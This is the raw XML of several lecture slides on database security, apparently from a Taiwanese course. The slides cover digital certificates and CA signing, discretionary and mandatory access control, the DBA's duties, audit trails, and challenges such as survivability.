          <a:xfrm>
            <a:off x="4678363" y="2765425"/>
            <a:ext cx="2441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aseline="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Digital Certificate</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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31753" name="群組 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3435350" y="3294063"/>
            <a:ext cx="5175250" cy="3267075"/>
            <a:chOff x="3435350" y="3294063"/>
            <a:chExt cx="5175250" cy="3267075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31754" name="Picture 2" descr="A digital certifica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350" y="3294063"/>
              <a:ext cx="5175250" cy="294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7" descr="檢視詳細資料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932" y="56467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文字方塊 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5218113" y="5938838"/>
              <a:ext cx="1304925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600" baseline="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>Borja Sotomayor</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" baseline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pic>
          <p:nvPicPr>
            <p:cNvPr id="31757" name="Picture 15" descr="household,keys,skeleton keys,生活用品,萬能鑰匙,鑰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105" y="5664494"/>
              <a:ext cx="8001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文字方塊 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7234238" y="5969000"/>
              <a:ext cx="11636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600" baseline="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>his public key</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" baseline="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3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591550" y="6386513"/>
            <a:ext cx="466725" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F527299D-3969-41F9-8BDC-09922EC4BEB7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>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Database Security Mechanisms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44575"/>
            <a:ext cx="8585200" cy="4070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A DBMS typically includes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a database security and authorization subsystem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 responsible for ensuring the security portions of a database against unauthorized access.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Two types of database security mechanisms:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000">
              <a:ea typeface="新細明體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Discretionary security mechanisms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To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grant privileges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to users, e.g. the capability to access specific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>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mandatory security mechanisms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charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>To enforce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multilevel security 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by classifying the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data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users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> into various security classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="194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114925"/>
            <a:ext cx="3554413" cy="1354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946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6975" y="5114925"/>
            <a:ext cx="3386138" cy="1354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920750" y="1041400"/>
            <a:ext cx="7273925" cy="5205413"/>
            <a:chOff x="920750" y="1041400"/>
            <a:chExt cx="7273925" cy="5205413"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32772" name="Picture 2" descr="A digital certificat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375" y="2301875"/>
              <a:ext cx="1562100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3" name="Picture 5" descr="businesses,contracts,legal documents,magnifying glasses,metaphors,offices,researching,reviewing,studying,合約書,商務,放大鏡,法律文件,研究,研讀,複審,象徵,辦公室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50" y="2598738"/>
              <a:ext cx="1201738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74" name="群組 14"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3236913" y="3875088"/>
              <a:ext cx="1114425" cy="779462"/>
              <a:chOff x="3866483" y="2486025"/>
              <a:chExt cx="1114436" cy="778950"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32795" name="摺角紙張 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3866483" y="2486025"/>
                <a:ext cx="1114436" cy="778950"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 16667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609600" indent="-609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zh-TW" altLang="en-US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32796" name="文字方塊 18"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3920843" y="2495880"/>
                <a:ext cx="942287" cy="522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TW" sz="1400" b="1" baseline="0">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                  </a:rPr>
                  <a:t>X?%^*&amp;%)I,gS#!@ ...</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400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pic>
          <p:nvPicPr>
            <p:cNvPr id="32775" name="Picture 5" descr="businesses,contracts,legal documents,magnifying glasses,metaphors,offices,researching,reviewing,studying,合約書,商務,放大鏡,法律文件,研究,研讀,複審,象徵,辦公室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213" y="5045075"/>
              <a:ext cx="1201737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6" name="Picture 11" descr="檢視詳細資料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688" y="2905125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7" name="Picture 13" descr="檢視詳細資料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288" y="4275138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8" name="向右箭號 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1486839">
              <a:off x="1901825" y="3859213"/>
              <a:ext cx="1352550" cy="207962"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 49893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79" name="向右箭號 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1486839">
              <a:off x="4213225" y="4927600"/>
              <a:ext cx="1352550" cy="207963"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 49893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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32780" name="群組 20"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4541838" y="1238250"/>
              <a:ext cx="1219200" cy="1117600"/>
              <a:chOff x="4541766" y="1238909"/>
              <a:chExt cx="1219199" cy="1116973"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32793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1766" y="1238909"/>
                <a:ext cx="1219199" cy="750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94" name="矩形 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4570341" y="1894179"/>
                <a:ext cx="1106486" cy="461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anose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:defRPr sz="3200" baseline="-250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TW" sz="2400" b="1" baseline="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000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rPr>
                  <a:t>CA</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" baseline="0">
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="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2781" name="向右箭號 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="2036918">
              <a:off x="5554663" y="2184400"/>
              <a:ext cx="450850" cy="161925"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 49718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609600" indent="-609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pic>
          <p:nvPicPr>
            <p:cNvPr id="32782" name="Picture 15" descr="household,keys,skeleton keys,生活用品,萬能鑰匙,鑰匙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8950" y="3078163"/>
              <a:ext cx="347663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783" name="直線單箭頭接點 24"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="5631656" y="3471069"/>
              <a:ext cx="1071563" cy="981075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2784" name="Picture 11" descr="檢視詳細資料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8" y="10414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785" name="直線單箭頭接點 28"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3571875" y="1577975"/>
              <a:ext cx="8477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6" name="文字方塊 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2312988" y="1779588"/>
              <a:ext cx="150971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zh-TW" sz="20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Certificate owner: A</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1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87" name="文字方塊 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2484438" y="3387725"/>
              <a:ext cx="1747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TW" sz="18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A’s Private key</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1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88" name="文字方塊 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6543675" y="3429000"/>
              <a:ext cx="165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TW" sz="1800" b="1" baseline="0" dirty="0">
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>A’s Public key</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0" dirty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89" name="文字方塊 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2032000" y="3865563"/>
              <a:ext cx="7461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sign</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1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90" name="文字方塊 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6083300" y="4860925"/>
              <a:ext cx="1546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Truly from A</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1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91" name="矩形 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5065713" y="4005263"/>
              <a:ext cx="3577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24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B</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="240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792" name="文字方塊 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4276725" y="5005388"/>
              <a:ext cx="10191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32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TW" sz="1800" b="1" baseline="0">
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                </a:rPr>
                <a:t>verify</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" baseline="0">
                <a:latin typeface="Calibri" panose="020F050202020403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363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>
          <a:xfrm>
            <a:off x="284163" y="7938"/>
            <a:ext cx="8774112" cy="884237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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anose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Digital Certificates</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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284163" y="806450"/>
            <a:ext cx="8774112" cy="4308475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information included in the certificate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certificate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owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> information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public key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>of the owner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date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> of issue of the certificate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validity period </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>specified by ‘Valid From’ and ‘Valid To’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Issuer identifier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digital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signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> of the issuing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CA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All the information is encoded through a message-digest function, which creates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digital signature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signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> certifies that the association between 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certificate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owner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public key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>is valid.</a:t>
            </a:r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F3FA94-5BAA-45A7-AA43-D4C5E20D0406}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/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93" y="4728507"/>
            <a:ext cx="3218546" cy="203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3187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>
          <a:xfrm>
            <a:off x="284163" y="122238"/>
            <a:ext cx="8774112" cy="685800"/>
          </a:xfrm>
        </p:spPr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Challenges of Database Security</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
              <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18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284163" y="865188"/>
            <a:ext cx="8774112" cy="5822995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Data Quality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Need techniques and solutions to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assess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> the quality of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Intellectual Property Rights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Watermarking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> techniques for relational data have been proposed.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Database Survivability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DB systems need to operate and continue their function, even with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reduced capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>, despite disruptive events such as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information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warfare attacks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Confinement: to prevent damage further spread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Damage assessment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Reconfiguration:  to allow operation to continue in a degraded mode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Repair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Fault treatment: to identify the weaknesses exploited in the attack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3200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4B6211-324E-4508-8F04-74F876E46251}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126292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277225" y="6415088"/>
            <a:ext cx="762000" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8104A7A0-1C62-4EDD-B782-76BBA7D3DA74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b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.2 Database Security and the DBA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158875"/>
            <a:ext cx="8774112" cy="4451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dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>The DBA is responsible for the overall security of the database system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="361950" indent="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TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>1. Account creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="36195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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>2. Privilege granting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="36195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TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>3. Privilege revocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="361950" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="8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zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>4. Security level assignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="361950" indent="0" eaLnBrk="1" hangingPunct="1"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en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" i="1" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="361950" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="8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zh-TW" sz="2400" b="1" i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400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Action 1 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>access control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, whereas 2 and 3 are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>discretionary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> and 4 is used to control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>mandatory authorization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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21509" name="群組 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4584700" y="1925638"/>
            <a:ext cx="2819400" cy="2352675"/>
            <a:chOff x="3067050" y="4378325"/>
            <a:chExt cx="2819400" cy="2352675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21511" name="Picture 5" descr="C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\j02919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10038" y="4378325"/>
              <a:ext cx="862012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2" name="矩形 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5014913" y="4600575"/>
              <a:ext cx="8715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b="1" baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>DBA</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21513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7050" y="5588000"/>
              <a:ext cx="2819400" cy="1143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1514" name="向下箭號 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="2167618">
              <a:off x="4129088" y="5286375"/>
              <a:ext cx="155575" cy="392113"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50163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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21515" name="向下箭號 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-3383065">
              <a:off x="4718051" y="5262562"/>
              <a:ext cx="171450" cy="390525"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 45925"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00CC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609600" indent="-609600"/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21510" name="文字方塊 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="2917825"/>
            <a:ext cx="149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baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Select?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Insert? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Delete? Drop?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1"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458200" y="6386513"/>
            <a:ext cx="600075" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7D5207CD-5DBC-436F-8613-CB8B9E71E6C0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charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Database Audits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06475"/>
            <a:ext cx="8774112" cy="49657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DBMS must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keep track of all operations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>that are applied by a certain user throughout each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>login session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To keep a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record of all updates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>applied to the database and of the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particular user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>who applied each update, we can modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" i="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>system log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>which includes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an entry for each operation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>applied to the database that may be required for recovery from a transaction failure or system crash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Database Audit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/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reviewing the log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> to examine all accesses and operations applied to the database during a certain time period.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Audit Trail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A database log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>that is used mainly for security purposes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="流程圖: 文件 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
